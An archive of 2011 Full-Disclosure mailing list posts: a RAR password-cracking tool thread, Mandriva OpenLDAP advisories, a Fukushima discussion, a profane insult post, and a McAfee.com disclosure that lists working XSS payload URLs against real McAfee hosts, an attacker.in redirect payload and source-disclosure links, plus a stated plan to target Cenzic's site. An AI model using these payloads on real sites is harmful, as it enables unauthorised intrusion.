Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-30 Thread Christopher Truncer
Seems like a good tool for when I can just let it run over time on a rar.

Thanks

Chris

On Mar 29, 2011, at 3:12 PM, Nagareshwar Talekar tnagaresh...@gmail.com wrote:

 Hi all,
 
 We have just released new password recovery tool - RarPasswordUnlocker
 - FREE tool to recover the password of protected RAR files. It is
 created by Neeraj who is leading contributor on SecurityXploded.com
 
 For more details  download visit RarPasswordUnlocker
 http://bit.ly/ft8i5k
 
 
 -- 
 With Regards
 Nagareshwar Talekar
 
 http://SecurityXploded.com
 http://PasswordForensics.com/
 http://NetCertScanner.com
 http://twitter.com/securityxploded
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-30 Thread Nicolai
Read the link ( 
http://nagareshwar.securityxploded.com/2011/03/30/launched-rar-password-unlocker-by-neeraj/
 )

It [the tool] uses brute force password recovery technique that can help you to 
recover not only easy but also complex passwords.

But without any GPU acceleration, it will take forever to bruteforce a complex 
password.

Use this tool instead: http://www.golubev.com/rargpu.htm

  _  

From: Jo Galara [mailto:jogal...@gmail.com]
To: full-disclosure@lists.grok.org.uk
Sent: Tue, 29 Mar 2011 22:13:03 +0200
Subject: Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

How does it work? Bruteforce?
  
  On 03/29/2011 09:12 PM, Nagareshwar Talekar wrote:
   Hi all,
   
   We have just released new password recovery tool - RarPasswordUnlocker
   - FREE tool to recover the password of protected RAR files. It is
   created by Neeraj who is leading contributor on SecurityXploded.com
   
   For more details  download visit RarPasswordUnlocker
   http://bit.ly/ft8i5k
   
   
  -- 
  Regards,
  
  Jo Galara
  



This e-mail and any attachments may contain confidential material for the sole 
use of the intended recipient. If you are not the intended recipient, please be 
aware that any disclosure, copying, distribution or use of this e-mail or any 
attachment is prohibited. If you have received this e-mail in error, please 
contact the sender and delete all copies.
Thank you for your cooperation

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread John Belushae
Seriously, what the fuck you are thinking, it's a newsletter or something
here ?
Choke on your ripped dumpshit product and die.

And please, keep your release update notification bullshit for your mum, OK.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-30 Thread Peter Osterberg
That made my morning laugh! =)

Andrew Farmer skrev 2011-03-30 00:22:
 Yes, but... well, JAD does a better job of explaining than I possibly could:

  Runtime rt = Runtime.getRuntime();

  String str = 7z.exe x ;
  str = str + \ + _filepath + \ ;
  str = str + -p\ + pwd + \ ;
  str = str + -o\ + _destpath + \;
  str = str +  -y;

  System.out.println(str);

  Process p = rt.exec(str);
  p.waitFor();

  if (p.exitValue() == 0)
  {
ret = true;
  }

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] nuclear plants reach software quality levels

2011-03-30 Thread Georgi Guninski
quote
The research paper concluded that there was a roughly 10 percent chance that a 
tsunami could test or overrun the defenses of the Fukushima Daiichi nuclear 
power plant within a 50-year span based on the most conservative assumptions.
But Tokyo Electric did nothing to change its safety planning based on that 
study, which was presented at a nuclear engineering conference in Miami in July 
2007.
[1]
/quote

on top of it their measuring devices overflowed:

quote
Those levels may be higher still, but authorities say 1,000 millisieverts is 
the upper limit of their measuring devices. [2]
/quote

[1] 
http://www.reuters.com/article/2011/03/29/us-japa-nuclear-risks-idUSTRE72S2UA20110329
[2] 
http://online.wsj.com/article/SB10001424052748704471904576229854179642220.html#

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread YGN Ethical Hacker Group
According to xssed.com,  there are two remaining XSS issues:

https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source codes and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/,  according to Network
World News editor - Ellen Messmer.  Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd




On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
 FIY

 http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes




 2011/3/28 Pablo Ximenes pa...@ximen.es:
 blog post about this: http://ximen.es/?p=469

 Please, don't throw stones at me.

 []'s


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes



 2011/3/27 YGN Ethical Hacker Group li...@yehg.net

 Vulnerabilities in *McAfee.com


 1. VULNERABILITY DESCRIPTION

 - Cross Site Scripting

 http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

 - Information Disclosure  Internal Hostname:
    http://www.mcafee.com/js/omniture/omniture_profile.js

    ($ ruby host-extract.rb -a
 http://www.mcafee.com/js/omniture/omniture_profile.js)

 - Information Disclosure  Source Code Disclosure:


  view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp

  view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp

  view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
        view-source:http://download.mcafee.com/clinic/Includes/common.asp
        view-source:http://download.mcafee.com/updates/upgrade_patches.asp

  view-source:http://download.mcafee.com/updates/common/dat_common.asp
        view-source:http://download.mcafee.com/updates/updates.asp
        view-source:http://download.mcafee.com/updates/superDat.asp
        view-source:http://download.mcafee.com/eval/evaluate2.asp
        view-source:http://download.mcafee.com/common/ssi/conditionals.asp

  view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
        view-source:http://download.mcafee.com/common/ssi/variables.asp

  view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
        view-source:http://download.mcafee.com/common/ssi/errHandler.asp
        view-source:http://download.mcafee.com/common/ssi/common_subs.asp

  view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
        view-source:http://download.mcafee.com/us/bannerAd.asp

  view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


 2. RECOMMENDATION

 - Fully utilize Mcafee FoundStone Experts
 - Use outbound monitoring of traffic to detect potential information
 leakage


 3. VENDOR

 McAfee Inc
 http://www.mcafee.com


 4. DISCLOSURE TIME-LINE

 2011-02-10: reported vendor
 2011-02-12: vendor replied we are working to resolve the issue as
 quickly as possible
 2011-03-27: vulnerability found to be unfixed completely
 2011-03-27: vulnerability disclosed


 5. REFERENCES

 Original Advisory URL:

 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
 Former Disclosure, 2008:
 http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
 Former Disclosure, 2009:

 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
 Former Disclosure, 2010:

 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
 host-extract: http://code.google.com/p/host-extract/
 Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
 xssed: http://www.xssed.com/search?key=mcafee.com
 Lessont Learn:
 http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

 #yehg [2011-03-27]

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Benji
I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
ethical hacking group YGN!!!111


(Plzdontxssme)

On 3/30/11, YGN Ethical Hacker Group li...@yehg.net wrote:
 According to xssed.com,  there are two remaining XSS issues:

 https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
 https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


 You guys know our disclosed issues are very simple and can easily be
 found through viewing HTML/JS source codes and simple Google Hacking
 (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

 However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
 http://www.cenzic.com/company/management/khera/,  according to Network
 World News editor - Ellen Messmer.  Thus, the next target is Cenzic
 web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
 is.


 -
 Best regards,
 YGN Ethical Hacker Group
 Yangon, Myanmar (Burma)
 http://yehg.net
 Our Lab | http://yehg.net/lab
 Our Directory | http://yehg.net/hwd




 On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
 FIY

 http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes




 2011/3/28 Pablo Ximenes pa...@ximen.es:
 blog post about this: http://ximen.es/?p=469

 Please, don't throw stones at me.

 []'s


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes



 2011/3/27 YGN Ethical Hacker Group li...@yehg.net

 Vulnerabilities in *McAfee.com


 1. VULNERABILITY DESCRIPTION

 - Cross Site Scripting

 http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

 - Information Disclosure  Internal Hostname:
    http://www.mcafee.com/js/omniture/omniture_profile.js

    ($ ruby host-extract.rb -a
 http://www.mcafee.com/js/omniture/omniture_profile.js)

 - Information Disclosure  Source Code Disclosure:


  view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp

  view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp

  view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
        view-source:http://download.mcafee.com/clinic/Includes/common.asp

  view-source:http://download.mcafee.com/updates/upgrade_patches.asp

  view-source:http://download.mcafee.com/updates/common/dat_common.asp
        view-source:http://download.mcafee.com/updates/updates.asp
        view-source:http://download.mcafee.com/updates/superDat.asp
        view-source:http://download.mcafee.com/eval/evaluate2.asp

  view-source:http://download.mcafee.com/common/ssi/conditionals.asp

  view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
        view-source:http://download.mcafee.com/common/ssi/variables.asp

  view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
        view-source:http://download.mcafee.com/common/ssi/errHandler.asp
        view-source:http://download.mcafee.com/common/ssi/common_subs.asp

  view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
        view-source:http://download.mcafee.com/us/bannerAd.asp

  view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


 2. RECOMMENDATION

 - Fully utilize Mcafee FoundStone Experts
 - Use outbound monitoring of traffic to detect potential information
 leakage


 3. VENDOR

 McAfee Inc
 http://www.mcafee.com


 4. DISCLOSURE TIME-LINE

 2011-02-10: reported vendor
 2011-02-12: vendor replied we are working to resolve the issue as
 quickly as possible
 2011-03-27: vulnerability found to be unfixed completely
 2011-03-27: vulnerability disclosed


 5. REFERENCES

 Original Advisory URL:

 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
 Former Disclosure, 2008:
 http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
 Former Disclosure, 2009:

 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
 Former Disclosure, 2010:

 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
 host-extract: http://code.google.com/p/host-extract/
 Demo:
 http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
 xssed: http://www.xssed.com/search?key=mcafee.com
 Lessont Learn:
 http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

 #yehg [2011-03-27]

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___

[Full-disclosure] [ MDVSA-2011:055 ] openldap

2011-03-30 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:055
 http://www.mandriva.com/security/
 ___

 Package : openldap
 Date: March 30, 2011
 Affected: 2009.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities has been identified and fixed in openldap:
 
 chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24,
 when a master-slave configuration with a chain overlay and
 ppolicy_forward_updates (aka authentication-failure forwarding) is
 used, allows remote authenticated users to bypass external-program
 authentication by sending an invalid password to a slave server
 (CVE-2011-1024).
 
 modrdn.c in slapd in OpenLDAP 2.4.x before 2.4.24 allows remote
 attackers to cause a denial of service (daemon crash) via a relative
 Distinguished Name (DN) modification request (aka MODRDN operation)
 that contains an empty value for the OldDN field (CVE-2011-1081).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149amp;products_id=490
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1024
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1081
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 83ccec2a20904df9a0ca143da248d5d9  
2009.0/i586/libldap2.4_2-2.4.11-3.4mdv2009.0.i586.rpm
 71b97d10738a74644373e91269eaeed6  
2009.0/i586/libldap2.4_2-devel-2.4.11-3.4mdv2009.0.i586.rpm
 9d8ed8fde6288f8883bb1d13344e047a  
2009.0/i586/libldap2.4_2-static-devel-2.4.11-3.4mdv2009.0.i586.rpm
 fb3d985950e150a02e8c230a311051c3  
2009.0/i586/openldap-2.4.11-3.4mdv2009.0.i586.rpm
 ba4a65282d12a598e1e951080a18565f  
2009.0/i586/openldap-clients-2.4.11-3.4mdv2009.0.i586.rpm
 ed18a20fa96960cfc10034c732b56b2c  
2009.0/i586/openldap-doc-2.4.11-3.4mdv2009.0.i586.rpm
 e68073473f08adf052cc166ea2f2c8e5  
2009.0/i586/openldap-servers-2.4.11-3.4mdv2009.0.i586.rpm
 ff1dcd171670dbb0e84845761baec2d4  
2009.0/i586/openldap-testprogs-2.4.11-3.4mdv2009.0.i586.rpm
 7f9e1581e730cc69109db37dd63453ba  
2009.0/i586/openldap-tests-2.4.11-3.4mdv2009.0.i586.rpm 
 1b9fa8641f7f41d4dd859e73170d0b34  
2009.0/SRPMS/openldap-2.4.11-3.4mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 ecf971b49682fb6637c335f2790413db  
2009.0/x86_64/lib64ldap2.4_2-2.4.11-3.4mdv2009.0.x86_64.rpm
 df29b7188a9b48141288950b00f2d7c9  
2009.0/x86_64/lib64ldap2.4_2-devel-2.4.11-3.4mdv2009.0.x86_64.rpm
 fbdfbe6bb56cbe74c4c35a711450ae04  
2009.0/x86_64/lib64ldap2.4_2-static-devel-2.4.11-3.4mdv2009.0.x86_64.rpm
 6336cf856ad3fd9cb71e69f89ae621a5  
2009.0/x86_64/openldap-2.4.11-3.4mdv2009.0.x86_64.rpm
 08cbb77b99ee361f06650fd04ab954c4  
2009.0/x86_64/openldap-clients-2.4.11-3.4mdv2009.0.x86_64.rpm
 9f1bcc61420e107387d20afcbfbda8ca  
2009.0/x86_64/openldap-doc-2.4.11-3.4mdv2009.0.x86_64.rpm
 a23b50b362db34c35d7e206147e40d1d  
2009.0/x86_64/openldap-servers-2.4.11-3.4mdv2009.0.x86_64.rpm
 0726dd1f6b44f0c215a3c27644e426db  
2009.0/x86_64/openldap-testprogs-2.4.11-3.4mdv2009.0.x86_64.rpm
 e66476117347d5c19ac64b6bf3a00484  
2009.0/x86_64/openldap-tests-2.4.11-3.4mdv2009.0.x86_64.rpm 
 1b9fa8641f7f41d4dd859e73170d0b34  
2009.0/SRPMS/openldap-2.4.11-3.4mdv2009.0.src.rpm

 Mandriva Enterprise Server 5:
 21948fd7dce8ce2c4c8fef768cfebda2  
mes5/i586/libldap2.4_2-2.4.11-3.4mdvmes5.2.i586.rpm
 7857e09b074a340d74373b90900d7669  
mes5/i586/libldap2.4_2-devel-2.4.11-3.4mdvmes5.2.i586.rpm
 9d2e59be28483bcf3acb4ff25089a390  
mes5/i586/libldap2.4_2-static-devel-2.4.11-3.4mdvmes5.2.i586.rpm
 2c3d52c077a56fa832d2d4209ad46834  
mes5/i586/openldap-2.4.11-3.4mdvmes5.2.i586.rpm
 acc2717ad2b29a7b02ba7f943ef92416  
mes5/i586/openldap-clients-2.4.11-3.4mdvmes5.2.i586.rpm
 d3deba0317c9f52ec463928a190dec51  
mes5/i586/openldap-doc-2.4.11-3.4mdvmes5.2.i586.rpm
 f4da14b20cccf8a3059bf512ba839fb4  
mes5/i586/openldap-servers-2.4.11-3.4mdvmes5.2.i586.rpm
 3c34b1a9af109ee763cb26ee7615e60c  
mes5/i586/openldap-testprogs-2.4.11-3.4mdvmes5.2.i586.rpm
 a52cf23420f23ed3d3ac84abe446ae92  
mes5/i586/openldap-tests-2.4.11-3.4mdvmes5.2.i586.rpm 
 b9bced393f520051e28a489c6d8ff9ab  
mes5/SRPMS/openldap-2.4.11-3.4mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 aa04b9b7aa03aab2ec36bf7027339ea6  
mes5/x86_64/lib64ldap2.4_2-2.4.11-3.4mdvmes5.2.x86_64.rpm
 7ef3c991e2bc597b527af6b1f4fbbe45  
mes5/x86_64/lib64ldap2.4_2-devel-2.4.11-3.4mdvmes5.2.x86_64.rpm
 978ea5eed1b8957f352503e1d1036f37  
mes5/x86_64/lib64ldap2.4_2-static-devel-2.4.11-3.4mdvmes5.2.x86_64.rpm
 2805cdd7f4b21269cbb7867492022743  

Re: [Full-disclosure] nuclear plants reach software quality levels

2011-03-30 Thread Peter Osterberg
Interesting...!

Does that mean that there is a 100 percent risk of the same tsunami over
500 years? Is there a cycle? When was the last one? Risk would be a lot
higher than 10 percent if it was, say, 300 years since the last tsunami

Haven't dug at all into it, this is just a very spontaneous thought...

Georgi Guninski skrev 2011-03-30 12:50:
 quote
 The research paper concluded that there was a roughly 10 percent chance that 
 a tsunami could test or overrun the defenses of the Fukushima Daiichi nuclear 
 power plant within a 50-year span based on the most conservative assumptions.
 But Tokyo Electric did nothing to change its safety planning based on that 
 study, which was presented at a nuclear engineering conference in Miami in 
 July 2007.
 [1]
 /quote

 on top of it their measuring devices overflowed:

 quote
 Those levels may be higher still, but authorities say 1,000 millisieverts is 
 the upper limit of their measuring devices. [2]
 /quote

 [1] 
 http://www.reuters.com/article/2011/03/29/us-japa-nuclear-risks-idUSTRE72S2UA20110329
 [2] 
 http://online.wsj.com/article/SB10001424052748704471904576229854179642220.html#

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2011:056 ] openldap

2011-03-30 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:056
 http://www.mandriva.com/security/
 ___

 Package : openldap
 Date: March 30, 2011
 Affected: 2010.0, 2010.1
 ___

 Problem Description:

 Multiple vulnerabilities has been identified and fixed in openldap:
 
 chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24,
 when a master-slave configuration with a chain overlay and
 ppolicy_forward_updates (aka authentication-failure forwarding) is
 used, allows remote authenticated users to bypass external-program
 authentication by sending an invalid password to a slave server
 (CVE-2011-1024).
 
 bind.cpp in back-ndb in OpenLDAP 2.4.x before 2.4.24 does not require
 authentication for the root Distinguished Name (DN), which allows
 remote attackers to bypass intended access restrictions via an
 arbitrary password (CVE-2011-1025).
 
 modrdn.c in slapd in OpenLDAP 2.4.x before 2.4.24 allows remote
 attackers to cause a denial of service (daemon crash) via a relative
 Distinguished Name (DN) modification request (aka MODRDN operation)
 that contains an empty value for the OldDN field (CVE-2011-1081).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1024
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1025
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1081
 ___

 Updated Packages:

 Mandriva Linux 2010.0:
 a5aa1bbb1e057c06c7a579926d166c96  
2010.0/i586/libldap2.4_2-2.4.19-2.2mdv2010.0.i586.rpm
 7b70f9724e632ac01ae9950ba403ee6e  
2010.0/i586/libldap2.4_2-devel-2.4.19-2.2mdv2010.0.i586.rpm
 414f0727313a619313742ad711204f5e  
2010.0/i586/libldap2.4_2-static-devel-2.4.19-2.2mdv2010.0.i586.rpm
 2706caae262f70ee3c508a7659b2046d  
2010.0/i586/openldap-2.4.19-2.2mdv2010.0.i586.rpm
 c3e50220a700e493e25248b561e4b8e4  
2010.0/i586/openldap-clients-2.4.19-2.2mdv2010.0.i586.rpm
 69022a5387c098694997e349877edcf2  
2010.0/i586/openldap-doc-2.4.19-2.2mdv2010.0.i586.rpm
 b7242509b552632e63a5dbff88f5c695  
2010.0/i586/openldap-servers-2.4.19-2.2mdv2010.0.i586.rpm
 ecfc24a4b48b71142bfcb56618068938  
2010.0/i586/openldap-testprogs-2.4.19-2.2mdv2010.0.i586.rpm
 2ed3d32741f610ac8dfac3af4ae0aa9f  
2010.0/i586/openldap-tests-2.4.19-2.2mdv2010.0.i586.rpm 
 a24ee1aeff19f2532440793bc059c147  
2010.0/SRPMS/openldap-2.4.19-2.2mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 e649fef25faedd26a2ce13893564bc78  
2010.0/x86_64/lib64ldap2.4_2-2.4.19-2.2mdv2010.0.x86_64.rpm
 f41262d928682f552de272d5ca37e74a  
2010.0/x86_64/lib64ldap2.4_2-devel-2.4.19-2.2mdv2010.0.x86_64.rpm
 defba9c212decee74be8e59910624cdf  
2010.0/x86_64/lib64ldap2.4_2-static-devel-2.4.19-2.2mdv2010.0.x86_64.rpm
 894f8526475ac4285740e09ddd47d114  
2010.0/x86_64/openldap-2.4.19-2.2mdv2010.0.x86_64.rpm
 a3058348fb23cd8675a6c8ff7ee3a71e  
2010.0/x86_64/openldap-clients-2.4.19-2.2mdv2010.0.x86_64.rpm
 1dc37b6747bce657406d34d53356ef58  
2010.0/x86_64/openldap-doc-2.4.19-2.2mdv2010.0.x86_64.rpm
 67272438e2f318498b59035305832f22  
2010.0/x86_64/openldap-servers-2.4.19-2.2mdv2010.0.x86_64.rpm
 ee723e923d9fc1e9d8d4c4031746ed42  
2010.0/x86_64/openldap-testprogs-2.4.19-2.2mdv2010.0.x86_64.rpm
 69102731a88f0f56ba57c2884e50  
2010.0/x86_64/openldap-tests-2.4.19-2.2mdv2010.0.x86_64.rpm 
 a24ee1aeff19f2532440793bc059c147  
2010.0/SRPMS/openldap-2.4.19-2.2mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 e4d21c1d7b63e87b15b98feff9545dbe  
2010.1/i586/libldap2.4_2-2.4.22-2.2mdv2010.2.i586.rpm
 a78754a11d32fbec86c001d5115aa462  
2010.1/i586/libldap2.4_2-devel-2.4.22-2.2mdv2010.2.i586.rpm
 c04365b9aec2b669eae606e83445ec57  
2010.1/i586/libldap2.4_2-static-devel-2.4.22-2.2mdv2010.2.i586.rpm
 c5c4ef75c70ad30c431967a40c9b44bd  
2010.1/i586/openldap-2.4.22-2.2mdv2010.2.i586.rpm
 fe450ae5ad6aed49ef166a98e57fca89  
2010.1/i586/openldap-clients-2.4.22-2.2mdv2010.2.i586.rpm
 4b5f3f22273324c8738149aaab18ff4e  
2010.1/i586/openldap-doc-2.4.22-2.2mdv2010.2.i586.rpm
 02351f80d3194c01b7502f89093a6bd1  
2010.1/i586/openldap-servers-2.4.22-2.2mdv2010.2.i586.rpm
 bae40a5c9bad9c4676c5a182048bf1b4  
2010.1/i586/openldap-testprogs-2.4.22-2.2mdv2010.2.i586.rpm
 a29483138d46b3bf5b0cf95725a11838  
2010.1/i586/openldap-tests-2.4.22-2.2mdv2010.2.i586.rpm 
 ce7b1b69d9c6697e20cef30134912601  
2010.1/SRPMS/openldap-2.4.22-2.2mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 afc9a2923eff6a9323f7880f47a286ab  
2010.1/x86_64/lib64ldap2.4_2-2.4.22-2.2mdv2010.2.x86_64.rpm
 b3474f085ea699e469b6052fb9ea8ef9  
2010.1/x86_64/lib64ldap2.4_2-devel-2.4.22-2.2mdv2010.2.x86_64.rpm
 f5c33620b65d7cd30458cf8ec2363551  

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Benji
However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/,  according to Network
World News editor - Ellen Messmer.  Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.

On Wed, Mar 30, 2011 at 2:57 PM, Cal Leeming c...@foxwhisper.co.uk wrote:

 ?


 On Wed, Mar 30, 2011 at 1:49 PM, Benji m...@b3nji.com wrote:

 I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
 ethical hacking group YGN!!!111


 (Plzdontxssme)

 On 3/30/11, YGN Ethical Hacker Group li...@yehg.net wrote:
  According to xssed.com,  there are two remaining XSS issues:
 
  https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
  https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //
 
 
  You guys know our disclosed issues are very simple and can easily be
  found through viewing HTML/JS source codes and simple Google Hacking
  (
 http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com
 ).
 
  However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
  http://www.cenzic.com/company/management/khera/,  according to Network
  World News editor - Ellen Messmer.  Thus, the next target is Cenzic
  web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
  is.
 
 
  -
  Best regards,
  YGN Ethical Hacker Group
  Yangon, Myanmar (Burma)
  http://yehg.net
  Our Lab | http://yehg.net/lab
  Our Directory | http://yehg.net/hwd
 
 
 
 
  On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
  FIY
 
 
 http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
 
 
  Pablo Ximenes
  http://ximen.es/
  http://twitter.com/pabloximenes
 
 
 
 
  2011/3/28 Pablo Ximenes pa...@ximen.es:
  blog post about this: http://ximen.es/?p=469
 
  Please, don't throw stones at me.
 
  []'s
 
 
  Pablo Ximenes
  http://ximen.es/
  http://twitter.com/pabloximenes
 
 
 
  2011/3/27 YGN Ethical Hacker Group li...@yehg.net
 
  Vulnerabilities in *McAfee.com
 
 
  1. VULNERABILITY DESCRIPTION
 
  - Cross Site Scripting
 
 
 http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in
 ')
 
  - Information Disclosure  Internal Hostname:
 http://www.mcafee.com/js/omniture/omniture_profile.js
 
 ($ ruby host-extract.rb -a
  http://www.mcafee.com/js/omniture/omniture_profile.js)
 
  - Information Disclosure  Source Code Disclosure:
 
 
   view-source:
 http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
 
   view-source:
 http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
 
   view-source:
 http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
 view-source:
 http://download.mcafee.com/clinic/Includes/common.asp
 
   view-source:http://download.mcafee.com/updates/upgrade_patches.asp
 
   view-source:
 http://download.mcafee.com/updates/common/dat_common.asp
 view-source:http://download.mcafee.com/updates/updates.asp
 view-source:http://download.mcafee.com/updates/superDat.asp
 view-source:http://download.mcafee.com/eval/evaluate2.asp
 
   view-source:http://download.mcafee.com/common/ssi/conditionals.asp
 
   view-source:
 http://download.mcafee.com/common/ssi/errHandler_soft.asp
 view-source:
 http://download.mcafee.com/common/ssi/variables.asp
 
   view-source:
 http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
 view-source:
 http://download.mcafee.com/common/ssi/errHandler.asp
 view-source:
 http://download.mcafee.com/common/ssi/common_subs.asp
 
   view-source:
 http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
